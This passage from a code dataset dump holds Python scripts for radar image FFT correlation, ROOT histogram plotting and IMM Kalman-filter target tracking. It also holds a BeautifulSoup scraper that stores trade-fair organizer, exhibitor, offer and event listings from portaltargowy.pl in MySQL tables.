###plt.title(col)\n\n\n","sub_path":"Experiment/simulation/4_Robustness/analysis/Random/mol_analysis.py","file_name":"mol_analysis.py","file_ext":"py","file_size_in_byte":2125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"329128555","text":"import numpy as np\nimport sys\nsys.path.append('./')\nsys.path.append('./fft')\n\nimport torch\nif sys.platform == \"darwin\":\n import matplotlib\n matplotlib.use('TkAgg')\nimport matplotlib.pyplot as plt\nfrom ar_image import Corr\nfrom skimage import color\nfrom skimage import io\nfrom boxx import *\nfrom myfft.fft import fft_decompose, fft_recompose\nfrom vis.vis_radar import vis_radar\n\n\ndef read_grey(path):\n return color.rgb2gray(io.imread('pics/p0.png'))\n\n\nuse_cuda = False\n# if torch.has_cudnn:\n# use_cuda = True\n\n\nR = np.load(\"pics/R.npz\")\nR = 
R[\"arr_0\"]\n\nimg0 = R[0]\nimg1 = R[1]\nimg2 = R[2]\n\nres = fft_decompose(R, ar_order=2, n_cascade_levels=8, R_thr=-10)\n\nprint(\">>> ori img0\")\n#loga(img0)\nprint(res[0].keys())\nfor i in range(8):\n img = res[0][\"cascade_levels\"][i]\n #plt.imshow(img)\n #plt.show()\nR = res[0][\"cascade_levels\"]\nprint(\"res[0].keys()\", res[0].keys())\n\nout_img = fft_recompose(R)\n\nprint(\">>> out_img\")\n# loga(out_img)\n\n\nprint(\"img0\", img0.shape)\nh = img0.shape[0]\nw = img0.shape[1]\n\nimg0 = np.reshape(img0, (1, 1, h, w))\nimg1 = np.reshape(img1, (1, 1, h, w))\nimg2 = np.reshape(img2, (1, 1, h, w))\nimg0 = torch.from_numpy(img0)\nimg1 = torch.from_numpy(img1)\nimg2 = torch.from_numpy(img2)\nif use_cuda:\n img0 = img0.cuda()\n img1 = img1.cuda()\n img2 = img2.cuda()\n\nR_thr = -10\nmask_R0 = img0 >= R_thr\nmask_R1 = img1 >= R_thr\nmask_R2 = img2 >= R_thr\nmask_R = mask_R0 * mask_R1 * mask_R2\nmask_R = mask_R[0,0].float()\n\n### patch level ###\n# corr_module = Corr(window_size=9, sigma=3)\n\n### image level ###\ncorr_module = Corr(image_level=True)\nif use_cuda:\n corr_module = corr_module.cuda()\nimg3 = corr_module(img0, img1, img2, mask_R)\n\n\nvis_radar(img0[0,0].data.numpy(), \"nofft_R0.png\")\nvis_radar(img1[0,0].data.numpy(), \"nofft_R1.png\")\nvis_radar(img2[0,0].data.numpy(), \"nofft_R2.png\")\nvis_radar(img3[0,0].data.numpy(), \"nofft_R3.png\")\n\nplt.imshow(img3[0,0].float())\nplt.show()\n\n\n\n\n\n\n\n\n","sub_path":"main_image.py","file_name":"main_image.py","file_ext":"py","file_size_in_byte":1924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"198503158","text":"\nfrom ROOT import *\nfrom array import array\nfrom math import fabs, sqrt\n\ndef function ():\n gStyle.SetOptStat(0)\n\n binxmet = 0\n binxmetR = 0\n\n rootfile = TFile.Open(\"./forMichael.root\")\n rootfile.ls()\n\n #Hmet = TH1D(\"Hmet\",\"Hmet\",40,0,200)\n #HmetR = TH1D(\"HmetR\",\"HmetR\",40,0,200)\n\n c1 = TCanvas(\"c1\",\"c1\",600,500)\n c1.cd()\n\n Hmet = gROOT.FindObject('h_met')\n \n for i in range(Hmet.GetNbinsX()):\n if (Hmet.GetBinContent(i) > binxmet):\n binxmet = Hmet.GetBinContent(i)\n\n Hmet.SetMarkerStyle(20)\n Hmet.SetMarkerSize(0.5)\n Hmet.SetMarkerColor(kRed)\n HmetR = gROOT.FindObject(\"h_met_R2g0p035\")\n\n for i in range(Hmet.GetNbinsX()):\n if (HmetR.GetBinContent(i) > binxmetR):\n binxmetR = HmetR.GetBinContent(i)\n \n scale = binxmetR/binxmet\n #scale = HmetR.Integral()/Hmet.Integral()\n\n HmetR.SetMarkerStyle(20)\n HmetR.SetMarkerSize(0.5)\n HmetR.SetMarkerColor(kBlue)\n \n Hmet.Scale(scale)\n\n Hmet.SetTitle(\"\")\n Hmet.GetXaxis().SetTitle(\"MET (GeV)\")\n Hmet.GetYaxis().SetTitle(\"A.U.\")\n Hmet.GetXaxis().SetRangeUser(0,1000)\n\n leg = TLegend(0.55,0.70,0.89,0.89)\n leg.SetFillColor(kWhite)\n leg.SetTextSize(0.038)\n leg.SetTextFont(42)\n leg.SetBorderSize(0)\n leg.AddEntry(HmetR,\"MET with R^2>0.035\",\"p\")\n leg.AddEntry(Hmet,\"MET\",\"p\")\n\n c1.SetLogy()\n\n Hmet.Draw(\"L\")\n HmetR.Draw(\"Lsame\")\n leg.Draw(\"same\")\n\n c1.SaveAs(\"razorvariable.png\")\n\n #output = TFile.Open(\"./ctau\"+ctau1+\"andctau\"+ctau2+\"lambda\"+lamb+\"/output\"+str(phot)+\".root\",\"recreate\")\n\n #output.Close()\n\n\ndef main():\n function()\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"DPAnalysis_Step3/razorvariable.py","file_name":"razorvariable.py","file_ext":"py","file_size_in_byte":1672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"221758911","text":"import 
matplotlib.pyplot as plt\nimport numpy as np\nimport copy\nfrom filterpy.kalman import IMMEstimator\nfrom filterpy.kalman import KalmanFilter\nfrom filterpy.common import Q_discrete_white_noise\nfrom math import sin, cos, sqrt, atan2\nfrom scipy.linalg import block_diag\nfrom tracker import simulateCircle as sc\nfrom tracker import predictIMM as imm\n\ndef sign(x):\n return(math.copysign(1,x))\n\ndef turning_target(N=600, turn_start=400):\n \"\"\" simulate a moving target blah\"\"\"\n\n #r = 1.\n dt = 1.\n phi_sim = np.array(\n [[1, dt, 0, 0],\n [0, 1, 0, 0],\n [0, 0, 1, dt],\n [0, 0, 0, 1]])\n\n gam = np.array([[dt**2/2, 0],\n [dt, 0],\n [0, dt**2/2],\n [0, dt]])\n\n x = np.array([[2000, 0, 10000, -15.]]).T\n\n simxs = []\n\n for i in range(N):\n x = np.dot(phi_sim, x)\n if i >= turn_start:\n x += np.dot(gam, np.array([[.075, .075]]).T)\n #print(x)\n simxs.append(x)\n simxs = np.array(simxs)\n\n return simxs\n\ndef circle_target(N=50):\n simxs = []\n # R, MX, MY, MZ, gamma\n cs = sc.simulateCircle(90., 100., 100., 0., gamma=60.0)\n dn = 180. / float(N)\n alpha = 0.\n xo,yo,zo = cs.pointAt(0.)\n while alpha < 180.:\n #for alpha in range(0,360,N):\n x,y,z = cs.pointAt(alpha)\n vx = (xo - x) / dt\n vy = (yo - y) / dt\n xs = np.array([x,vx,y,vy]).T\n #print(xs)\n xo = x\n yo = y\n simxs.append(xs)\n alpha = alpha + dn\n\n return np.array(simxs)\n\ndef linear_target(N=50):\n m = 0.5\n b = 100.\n simxs = []\n for x in range(0,10*N,10):\n y = m*x+b\n xs = np.array([x,10.,y,5.])\n simxs.append(xs)\n return np.array(simxs)\n\nif __name__ == \"__main__\":\n\n N = 40\n dt = 0.04\n p = 100.\n q = 5.\n #track = turning_target(N)\n track = circle_target(N)\n #track = linear_target(N)\n alpha0 = atan2(track[0,2], track[0,0])\n alpha1 = atan2(track[1,2], track[1,0])\n omega = 1.41 * (alpha0 - alpha1) / dt\n print(omega)\n\n # create noisy measurements\n zs = np.zeros((N, 2))\n r = 0.5\n for i in range(N):\n px = track[i, 0] + np.random.randn()*r\n py = track[i, 2] + np.random.randn()*r\n #print \"px: %4.2f, py: %4.2f\" % (px,py)\n zs[i, 0] = px\n zs[i, 1] = py\n\n\n immfilter = imm.filterIMM(dt,omega,p,r,q)\n xstart = np.array([[10., 10., 0, 100., 1., 0]]).T\n immfilter.startAt(xstart)\n xs, probs = [], []\n for i, z in enumerate(zs):\n #z = np.array([z]).T\n #print(\"x: %4.2f, y: %4.2f\" % (z[0], z[1]))\n #bank.update(z)\n x = z[0]\n y = z[1]\n immfilter.update(x,y)\n xs.append(immfilter.bank.x.copy())\n probs.append(immfilter.bank.mu.copy())\n print(immfilter.bank.mu)\n\n\n xs = np.array(xs)\n #cvxs = np.array(cvxs)\n #caxs = np.array(caxs)\n probs = np.array(probs)\n plt.subplot(131)\n plt.title('imm2.py')\n plt.plot(track[:, 0], track[:, 2], '--r')\n plt.plot(xs[:, 0], xs[:, 3], 'k')\n plt.scatter(zs[:, 0], zs[:, 1], marker='+')\n\n plt.subplot(132)\n plt.plot(probs[:, 0], 'r')\n plt.plot(probs[:, 1], 'g')\n plt.plot(probs[:, 2], 'b')\n\n plt.ylim(0., 1.0)\n plt.legend(['p(cv)', 'p(ca)', 'p(ct)'])\n plt.title('probability ratio')\n\n plt.subplot(133)\n dx = (xs[:,0].T - zs[:,0]) / zs[:,0]\n dy = (xs[:,3].T - zs[:,1]) / zs[:,1]\n plt.plot(dx.T, 'g')\n plt.plot(dy.T, 'b')\n plt.title('relative error')\n plt.legend(['dx', 'dy'])\n plt.axhline(y=0, color='k')\n\n\n plt.show()\n","sub_path":"src/imm-turn-test.py","file_name":"imm-turn-test.py","file_ext":"py","file_size_in_byte":3624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"533240136","text":"import urllib.request\r\nfrom bs4 import BeautifulSoup\r\nimport mysql.connector\r\nimport 
time\r\nfrom datetime import date\r\n\r\nmydb = mysql.connector.connect(\r\n host=\"xxx\",\r\n user=\"xxx\",\r\n password=\"xxx\",\r\n database=\"xxx\"\r\n\r\n)\r\n\r\nmycursor = mydb.cursor(buffered=True)\r\n\r\nt = time.localtime()\r\ncurrent_time = time.strftime(\"%H_%M_%S\", t)\r\ntoday = str(date.today())\r\ntoday = today.replace(\"-\", \"_\")\r\n\r\nbasic_table_name_organizers = today + \"_\" + current_time + \"_\" + 'portal_targowy_organizers'\r\nsql_table_creation = \"CREATE TABLE \" + basic_table_name_organizers + \" (organizer_id int NOT NULL AUTO_INCREMENT PRIMARY KEY, organizer_full_name VARCHAR(255), organizer_address VARCHAR(255), organizer_www VARCHAR(255), organizer_telephone int, organizer_email VARCHAR(255), organizer_page_url VARCHAR(255)) COLLATE=utf8_general_ci\"\r\nmycursor.execute(sql_table_creation)\r\nsqlFormula_organizers = \"INSERT INTO \" + basic_table_name_organizers + \" (organizer_id, organizer_full_name, organizer_address, organizer_www, organizer_telephone, organizer_email, organizer_page_url) VALUES (%s, %s, %s, %s, %s, %s, %s)\"\r\n\r\nbasic_table_name_categories = today + \"_\" + current_time + \"_\" + 'portal_targowy_categories'\r\nsql_table_creation = \"CREATE TABLE \" + basic_table_name_categories + \" (category_id int NOT NULL PRIMARY KEY, category_name VARCHAR(255)) COLLATE=utf8_general_ci\"\r\nmycursor.execute(sql_table_creation)\r\nsqlFormula_categories = \"INSERT INTO \" + basic_table_name_categories + \" (category_id, category_name) VALUES (%s, %s)\"\r\n\r\nbasic_table_name_offers_data = today + \"_\" + current_time + \"_\" + 'portal_targowy_offers_data'\r\nsql_table_creation = \"CREATE TABLE \" + basic_table_name_offers_data + \" (offer_id int NOT NULL AUTO_INCREMENT PRIMARY KEY, name VARCHAR(255), trade_portaltargowy_site VARCHAR(255), trade_fair VARCHAR(255), announce_date_valid VARCHAR(255), announce_type VARCHAR(255), description MEDIUMTEXT, exhibitor_name VARCHAR(255), exhibitor_address VARCHAR(255), exhibitor_www VARCHAR(255), exhibitor_telephone int, exhibitor_email VARCHAR(255), category_id int, FOREIGN KEY (category_id) REFERENCES \" + basic_table_name_categories + \"(category_id)) COLLATE=utf8_general_ci\"\r\nmycursor.execute(sql_table_creation)\r\nsqlFormula_offers_data = \"INSERT INTO \" + basic_table_name_offers_data + \" (offer_id, name, trade_portaltargowy_site, trade_fair, announce_date_valid, announce_type, description, exhibitor_name, exhibitor_address, exhibitor_www, exhibitor_telephone, exhibitor_email, category_id) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\"\r\n\r\nbasic_table_name_exhibitors = today + \"_\" + current_time + \"_\" + 'portal_targowy_exhibitors'\r\nsql_table_creation = \"CREATE TABLE \" + basic_table_name_exhibitors + \" (exhibitor_id int NOT NULL AUTO_INCREMENT PRIMARY KEY, exhibitor_full_name VARCHAR(255), exhibitor_address VARCHAR(255), exhibitor_www VARCHAR(255), exhibitor_telephone int, exhibitor_email VARCHAR(255), exhibitor_logo VARCHAR(255)) COLLATE=utf8_general_ci\"\r\nmycursor.execute(sql_table_creation)\r\nsqlFormula_exhibitors = \"INSERT INTO \" + basic_table_name_exhibitors + \" (exhibitor_id, exhibitor_full_name, exhibitor_address, exhibitor_www, exhibitor_telephone, exhibitor_email, exhibitor_logo) VALUES (%s, %s, %s, %s, %s, %s, %s)\"\r\n\r\nbasic_table_name_cat_j_exh = today + \"_\" + current_time + \"_\" + 'portal_targowy_cat_j_exh'\r\nsql_table_creation = \"CREATE TABLE \" + basic_table_name_cat_j_exh + \" (category_id int NOT NULL, FOREIGN KEY (category_id) REFERENCES \" 
+ basic_table_name_categories + \"(category_id), exhibitor_id int NOT NULL, FOREIGN KEY (exhibitor_id) REFERENCES \" + basic_table_name_exhibitors + \"(exhibitor_id)) COLLATE=utf8_general_ci\"\r\nmycursor.execute(sql_table_creation)\r\nsqlFormula_cat_j_exh = \"INSERT INTO \" + basic_table_name_cat_j_exh + \" (category_id, exhibitor_id) VALUES (%s, %s)\"\r\n\r\nbasic_table_name_events = today + \"_\" + current_time + \"_\" + 'portal_targowy_events'\r\nsql_table_creation = \"CREATE TABLE \" + basic_table_name_events + \" (event_id int NOT NULL AUTO_INCREMENT PRIMARY KEY, event_full_name VARCHAR(255), event_logo VARCHAR(255), event_date VARCHAR(255), event_localization VARCHAR(255), event_www VARCHAR(255), event_description MEDIUMTEXT, organizer_id int, FOREIGN KEY (organizer_id) REFERENCES \" + basic_table_name_organizers + \"(organizer_id)) COLLATE=utf8_general_ci\"\r\nmycursor.execute(sql_table_creation)\r\nsqlFormula_events = \"INSERT INTO \" + basic_table_name_events + \" (event_id, event_full_name, event_logo, event_date, event_localization, event_www, event_description, organizer_id) VALUES (%s, %s, %s, %s, %s, %s, %s, %s)\"\r\n\r\nbasic_table_name_cat_j_ev = today + \"_\" + current_time + \"_\" + 'portal_targowy_cat_j_ev'\r\nsql_table_creation = \"CREATE TABLE \" + basic_table_name_cat_j_ev + \" (category_id int NOT NULL, FOREIGN KEY (category_id) REFERENCES \" + basic_table_name_categories + \"(category_id), event_id int NOT NULL, FOREIGN KEY (event_id) REFERENCES \" + basic_table_name_events + \"(event_id)) COLLATE=utf8_general_ci\"\r\nmycursor.execute(sql_table_creation)\r\nsqlFormula_cat_j_ev = \"INSERT INTO \" + basic_table_name_cat_j_ev + \" (category_id, event_id) VALUES (%s, %s)\"\r\n\r\npage_number = 1\r\norganizer_full_name = None\r\norganizer_address = None\r\norganizer_www = None\r\norganizer_telephone = None\r\norganizer_email = None\r\norganizer_id = 1\r\nwhile True:\r\n organizer_page_url = 'https://portaltargowy.pl/organizatorzy?page=' + str(page_number)\r\n print(\"organizer page number: \" + str(page_number))\r\n organizer_page_req = urllib.request.Request(organizer_page_url, headers={'User-Agent': \"Mozilla/5.0\"})\r\n organizer_page = urllib.request.urlopen(organizer_page_req)\r\n organizer_page_html = organizer_page.read()\r\n organizer_page.close()\r\n organizer_page_soup = BeautifulSoup(organizer_page_html, \"html.parser\")\r\n organizer_list = organizer_page_soup.findAll(\"div\", {\"class\": \"ccol-lg-8 col-md-6 mt-2\"})\r\n if not organizer_list:\r\n break\r\n for row in organizer_list:\r\n organizer_page_url = row.a[\"href\"]\r\n organizer_page_req = urllib.request.Request(organizer_page_url, headers={'User-Agent': \"Mozilla/5.0\"})\r\n organizer_page = urllib.request.urlopen(organizer_page_req)\r\n organizer_page_html = organizer_page.read()\r\n organizer_page.close()\r\n organizer_page_soup = BeautifulSoup(organizer_page_html, \"html.parser\")\r\n organizer_list = organizer_page_soup.select('#organizer .col-md-8')\r\n organizer_list = organizer_list[0].text.split('\\n')\r\n for y in range(5):\r\n # print(x)\r\n try:\r\n if organizer_list[y + 1].strip().startswith('Pełna nazwa'):\r\n organizer_full_name = organizer_list[y + 1].strip()\r\n organizer_full_name = organizer_full_name.replace('Pełna nazwa: ', '')\r\n except IndexError:\r\n continue\r\n try:\r\n if organizer_list[y + 1].strip().startswith('Adres'):\r\n organizer_address = organizer_list[y + 1].strip()\r\n organizer_address = organizer_address.replace('Adres: ', '')\r\n except IndexError:\r\n 
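# organizer pages do not always include all five detail rows; skip a field when its row is absent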
continue\r\n        try:\r\n            if organizer_list[y + 1].strip().startswith('WWW'):\r\n                organizer_www = organizer_list[y + 1].strip()\r\n                organizer_www = organizer_www.replace('WWW: ', '')\r\n        except IndexError:\r\n            continue\r\n        try:\r\n            if organizer_list[y + 1].strip().startswith('Telefon'):\r\n                organizer_telephone = organizer_list[y + 1].strip()\r\n                organizer_telephone = organizer_telephone.replace('Telefon: ', '')\r\n        except IndexError:\r\n            continue\r\n        try:\r\n            if organizer_list[y + 1].strip().startswith('E-mail'):\r\n                organizer_email = organizer_list[y + 1].strip()\r\n                organizer_email = organizer_email.replace('E-mail: ', '')\r\n        except IndexError:\r\n            continue\r\n    print(organizer_full_name)\r\n    print(organizer_address)\r\n    print(organizer_www)\r\n    print(organizer_telephone)\r\n    print(organizer_email)\r\n    sql_data_organizers = (organizer_id, organizer_full_name, organizer_address, organizer_www, organizer_telephone, organizer_email, organizer_page_url)\r\n    # print(sql_data_organizer)\r\n    mycursor.execute(sqlFormula_organizers, sql_data_organizers)\r\n    organizer_full_name = None\r\n    organizer_address = None\r\n    organizer_www = None\r\n    organizer_telephone = None\r\n    organizer_email = None\r\n    print(\"organizer nr: \" + str(organizer_id))\r\n    organizer_id = organizer_id + 1\r\n    page_number = page_number + 1\r\nevent_id = 1\r\noffer_id = 1\r\nexhibitor_id = 1\r\nexhibitor_full_name = None\r\nexhibitor_address = None\r\nexhibitor_www = None\r\nexhibitor_telephone = None\r\nexhibitor_email = None\r\nexhibitor_full_name_mysql = None\r\nexhibitor_address_mysql = None\r\n# x is the number of categories; it has to be set manually in the code\r\nfor x in range(17):\r\n    category_id = x + 1\r\n    offers_page_url = 'https://portaltargowy.pl/wyniki-wyszukiwania?q=&category=' + str(category_id)\r\n    offers_page_req = urllib.request.Request(offers_page_url, headers={'User-Agent': \"Mozilla/5.0\"})\r\n    offers_page = urllib.request.urlopen(offers_page_req)\r\n    offers_page_html = offers_page.read()\r\n    offers_page.close()\r\n    offers_page_soup = BeautifulSoup(offers_page_html, \"html.parser\")\r\n    category_name = offers_page_soup.select('small')\r\n    category_name = category_name[0].text.strip()\r\n    category_name = category_name.replace('Wyniki wyszukiwania dla frazy: \\\"\\\"\\n w kategorii: \\\"', '')\r\n    category_name = category_name[:-1]\r\n    sql_data_categories = (category_id, category_name)\r\n    mycursor.execute(sqlFormula_categories, sql_data_categories)\r\n    promo_list1 = offers_page_soup.find(\"div\", {\"id\": \"offers\"})\r\n    try:\r\n        promo_list2 = promo_list1.findAll(\"div\", {\"class\": \"col-md-6 mt-2\"})\r\n    except AttributeError:\r\n        continue\r\n    for row in promo_list2:\r\n        offers_page_url2 = row.a[\"href\"]\r\n        offers_page_req2 = urllib.request.Request(offers_page_url2, headers={'User-Agent': \"Mozilla/5.0\"})\r\n        offers_page2 = urllib.request.urlopen(offers_page_req2)\r\n        offers_page_html2 = offers_page2.read()\r\n        offers_page2.close()\r\n        offers_page_soup2 = BeautifulSoup(offers_page_html2, \"html.parser\")\r\n        name = offers_page_soup2.find(\"h1\", {\"class\": \"line-after\"}).text\r\n        text_right = offers_page_soup2.select('.col-md-12 .text-right')\r\n        trade_portaltargowy_site = text_right[0].a[\"href\"]\r\n        text_right = text_right[0].text\r\n        # print(text_right[0].text.strip())\r\n        text_right = text_right.split(\"|\")\r\n        trade_fair = text_right[0].strip()\r\n        trade_fair = trade_fair.replace('Targi: ', '')\r\n        announce_date_valid = text_right[1]\r\n        announce_date_valid = announce_date_valid.replace('Ogłoszenie 
ważne\\n ', '').strip()\r\n announce_type = text_right[2].strip()\r\n description = offers_page_soup2.select('.col-md-12 .col-md-12')\r\n description = description[0].text.strip()\r\n description = description.replace('Opis ogłoszenia:\\n', '')\r\n exhibitor_data1 = offers_page_soup2.select('br+ .row .col-md-12')\r\n exhibitor_data1 = exhibitor_data1[0].text.strip()\r\n if exhibitor_data1 == \"Galeria ogłoszenia:\":\r\n exhibitor_data2 = offers_page_soup2.select('.col-md-12 .col-md-8')\r\n try:\r\n exhibitor_data2 = exhibitor_data2[0].text.strip()\r\n except IndexError:\r\n exhibitor_data3 = offers_page_soup2.select('.row:nth-child(9) .col-md-12')\r\n exhibitor_data3 = exhibitor_data3[0].text.strip()\r\n exhibitor_data3 = exhibitor_data3.split(\"\\n\")\r\n exhibitor_name = exhibitor_data3[1].strip()\r\n # print(exhibitor_name)\r\n exhibitor_address = exhibitor_data3[3].strip() + exhibitor_data3[4].strip()\r\n exhibitor_address = exhibitor_address.replace('Adres: ', '')\r\n # print(exhibitor_address)\r\n exhibitor_www = exhibitor_data3[5].strip()\r\n exhibitor_www = exhibitor_www.replace('WWW: ', '')\r\n # print(exhibitor_www)\r\n exhibitor_telephone = exhibitor_data3[-1].strip()\r\n if exhibitor_telephone.startswith(\"WWW\"):\r\n exhibitor_telephone = None\r\n # print(exhibitor_telephone)\r\n exhibitor_email = None\r\n else:\r\n exhibitor_data2 = exhibitor_data2.split(\"\\n\")\r\n exhibitor_name = exhibitor_data2[2].strip()\r\n # print(exhibitor_name)\r\n exhibitor_address = exhibitor_data2[5].strip()\r\n exhibitor_address = exhibitor_address.replace('Adres: ', '')\r\n # print(exhibitor_address)\r\n exhibitor_www = exhibitor_data2[7].strip()\r\n exhibitor_www = exhibitor_www.replace('WWW: ', '')\r\n # print(exhibitor_www)\r\n exhibitor_telephone = exhibitor_data2[8].strip()\r\n # print(exhibitor_telephone)\r\n exhibitor_email = exhibitor_data2[10].strip()\r\n exhibitor_email = exhibitor_email.replace('E-mail: ', '')\r\n # print(exhibitor_email)\r\n else:\r\n exhibitor_data1 = exhibitor_data1.split(\"\\n\")\r\n exhibitor_name = exhibitor_data1[1].strip()\r\n # print(exhibitor_name)\r\n exhibitor_address = exhibitor_data1[3].strip() + exhibitor_data1[4].strip()\r\n exhibitor_address = exhibitor_address.replace('Adres: ', '')\r\n # print(exhibitor_address)\r\n exhibitor_www = exhibitor_data1[5].strip()\r\n exhibitor_www = exhibitor_www.replace('WWW: ', '')\r\n # print(exhibitor_www)\r\n exhibitor_telephone = exhibitor_data1[-1].strip()\r\n exhibitor_telephone = exhibitor_telephone.replace('Telefon: ', '')\r\n if exhibitor_telephone.startswith(\"WWW\"):\r\n exhibitor_telephone = None\r\n # print(exhibitor_telephone)\r\n exhibitor_email = None\r\n sql_data_offers_data = (offer_id, name, trade_portaltargowy_site, trade_fair, announce_date_valid, announce_type, description, exhibitor_name, exhibitor_address, exhibitor_www, exhibitor_telephone, exhibitor_email, category_id)\r\n mycursor.execute(sqlFormula_offers_data, sql_data_offers_data)\r\n offer_id = offer_id + 1\r\n page_number = 1\r\n while True:\r\n print(\"category number \" + str(x + 1))\r\n print(\"page number \" + str(page_number))\r\n exhibitor_page_url = 'https://portaltargowy.pl/wystawcy?category=' + str(x + 1) + '&page=' + str(page_number)\r\n exhibitor_page_req = urllib.request.Request(exhibitor_page_url, headers={'User-Agent': \"Mozilla/5.0\"})\r\n exhibitor_page = urllib.request.urlopen(exhibitor_page_req)\r\n exhibitor_page_html = exhibitor_page.read()\r\n exhibitor_page.close()\r\n exhibitor_page_soup = 
BeautifulSoup(exhibitor_page_html, \"html.parser\")\r\n exhibitor_list = exhibitor_page_soup.findAll(\"div\", {\"class\": \"col-lg-8 mt-2\"})\r\n if not exhibitor_list:\r\n break\r\n for row in exhibitor_list:\r\n exhibitor_page_url = row.a[\"href\"]\r\n exhibitor_page_req = urllib.request.Request(exhibitor_page_url, headers={'User-Agent': \"Mozilla/5.0\"})\r\n exhibitor_page = urllib.request.urlopen(exhibitor_page_req)\r\n exhibitor_page_html = exhibitor_page.read()\r\n exhibitor_page.close()\r\n exhibitor_page_soup = BeautifulSoup(exhibitor_page_html, \"html.parser\")\r\n exhibitor_data = exhibitor_page_soup.select('.col-md-8 .col-md-8')\r\n exhibitor_data = exhibitor_data[0].text.strip()\r\n exhibitor_data = exhibitor_data.split(\"\\n\")\r\n for y in range(4):\r\n try:\r\n if exhibitor_data[y].strip().startswith('Pełna nazwa'):\r\n exhibitor_full_name = exhibitor_data[y].strip()\r\n exhibitor_full_name = exhibitor_full_name.replace('Pełna nazwa: ', '')\r\n exhibitor_full_name_mysql = (exhibitor_full_name,)\r\n print(exhibitor_full_name)\r\n except IndexError:\r\n continue\r\n try:\r\n if exhibitor_data[y].strip().startswith('Adres'):\r\n exhibitor_address = exhibitor_data[y].strip()\r\n exhibitor_address = exhibitor_address.replace('Adres: ', '')\r\n exhibitor_address_mysql = (exhibitor_address,)\r\n print(exhibitor_address)\r\n except IndexError:\r\n continue\r\n try:\r\n if exhibitor_data[y].strip().startswith('WWW'):\r\n exhibitor_www = exhibitor_data[y].strip()\r\n exhibitor_www = exhibitor_www.replace('WWW: ', '')\r\n print(exhibitor_www)\r\n except IndexError:\r\n continue\r\n try:\r\n if exhibitor_data[y].strip().startswith('Telefon'):\r\n exhibitor_telephone = exhibitor_data[y].strip()\r\n exhibitor_telephone = exhibitor_telephone.replace('Telefon: ', '')\r\n print(exhibitor_telephone)\r\n except IndexError:\r\n continue\r\n try:\r\n if exhibitor_data[y].strip().startswith('E-mail'):\r\n exhibitor_email = exhibitor_data[y].strip()\r\n exhibitor_email = exhibitor_email.replace('E-mail: ', '')\r\n print(exhibitor_email)\r\n except IndexError:\r\n continue\r\n exhibitor_logo = exhibitor_page_soup.select('.logo-exhibitor img')\r\n exhibitor_logo = exhibitor_logo[0][\"src\"]\r\n print(exhibitor_logo)\r\n select_exists_exhibitor_full_name_formula = \"SELECT EXISTS(SELECT * from \" + basic_table_name_exhibitors + \" WHERE exhibitor_full_name = \" + \"%s\" + \")\"\r\n mycursor.execute(select_exists_exhibitor_full_name_formula, exhibitor_full_name_mysql)\r\n exists_exhibitor_full_name_condition = mycursor.fetchone()\r\n exists_exhibitor_full_name_condition = exists_exhibitor_full_name_condition[0]\r\n print(\"existence condition name: \" + str(exists_exhibitor_full_name_condition))\r\n select_exists_exhibitor_address_formula = \"SELECT EXISTS(SELECT * from \" + basic_table_name_exhibitors + \" WHERE exhibitor_address = \" + \"%s\" + \")\"\r\n mycursor.execute(select_exists_exhibitor_address_formula, exhibitor_address_mysql)\r\n exists_exhibitor_address_condition = mycursor.fetchone()\r\n exists_exhibitor_address_condition = exists_exhibitor_address_condition[0]\r\n print(\"existence condition address: \" + str(exists_exhibitor_address_condition))\r\n if exists_exhibitor_full_name_condition and exists_exhibitor_address_condition:\r\n print(\"EXIST\")\r\n select_existing_exhibitor_id_formula = \"SELECT exhibitor_id FROM \" + basic_table_name_exhibitors + \" WHERE exhibitor_full_name = %s\"\r\n mycursor.execute(select_existing_exhibitor_id_formula, exhibitor_full_name_mysql)\r\n 
existing_exhibitor_id = mycursor.fetchone()\r\n existing_exhibitor_id = existing_exhibitor_id[0]\r\n sql_data_cat_j_exh = (category_id, existing_exhibitor_id)\r\n else:\r\n print(\"NOT EXIST\")\r\n sql_data_exhibitors = (exhibitor_id, exhibitor_full_name, exhibitor_address, exhibitor_www, exhibitor_telephone, exhibitor_email, exhibitor_logo)\r\n mycursor.execute(sqlFormula_exhibitors, sql_data_exhibitors)\r\n sql_data_cat_j_exh = (category_id, exhibitor_id)\r\n mycursor.execute(sqlFormula_cat_j_exh, sql_data_cat_j_exh)\r\n if not (exists_exhibitor_full_name_condition and exists_exhibitor_address_condition):\r\n exhibitor_id = exhibitor_id + 1\r\n exhibitor_full_name = None\r\n exhibitor_address = None\r\n exhibitor_www = None\r\n exhibitor_telephone = None\r\n exhibitor_email = None\r\n exhibitor_full_name_mysql = None\r\n exhibitor_address_mysql = None\r\n page_number = page_number + 1\r\n page_number = 1\r\n while True:\r\n print(\"category number \" + str(x + 1))\r\n print(\"page number \" + str(page_number))\r\n event_page_url = 'https://portaltargowy.pl/targi?category=' + str(category_id) + '&page=' + str(page_number)\r\n event_page_req = urllib.request.Request(event_page_url, headers={'User-Agent': \"Mozilla/5.0\"})\r\n event_page = urllib.request.urlopen(event_page_req)\r\n event_page_html = event_page.read()\r\n event_page.close()\r\n event_page_soup = BeautifulSoup(event_page_html, \"html.parser\")\r\n event_list = event_page_soup.findAll(\"div\", {\"class\": \"col-lg-8 col-md-6\"})\r\n if not event_list:\r\n break\r\n for row in event_list:\r\n event_page_url = row.a[\"href\"]\r\n event_page_req = urllib.request.Request(event_page_url, headers={'User-Agent': \"Mozilla/5.0\"})\r\n event_page = urllib.request.urlopen(event_page_req)\r\n event_page_html = event_page.read()\r\n event_page.close()\r\n event_page_soup = BeautifulSoup(event_page_html, \"html.parser\")\r\n event_full_name = event_page_soup.select('small')\r\n event_full_name = event_full_name[0].text\r\n event_full_name = event_full_name.replace('Pełna nazwa targów: ', '')\r\n event_full_name_mysql = (event_full_name,)\r\n print(event_full_name)\r\n event_logo = event_page_soup.select('.event-box-single img')\r\n event_logo = event_logo[0][\"src\"]\r\n print(event_logo)\r\n event_date = event_page_soup.select('.col-sm-6:nth-child(1)')\r\n event_date = event_date[0].text.strip()\r\n event_date = event_date.split(\"\\n\")\r\n event_date = event_date[1].strip() + \" \" + event_date[2].strip()\r\n print(event_date)\r\n event_localization = event_page_soup.select('.col-sm-6:nth-child(2)')\r\n 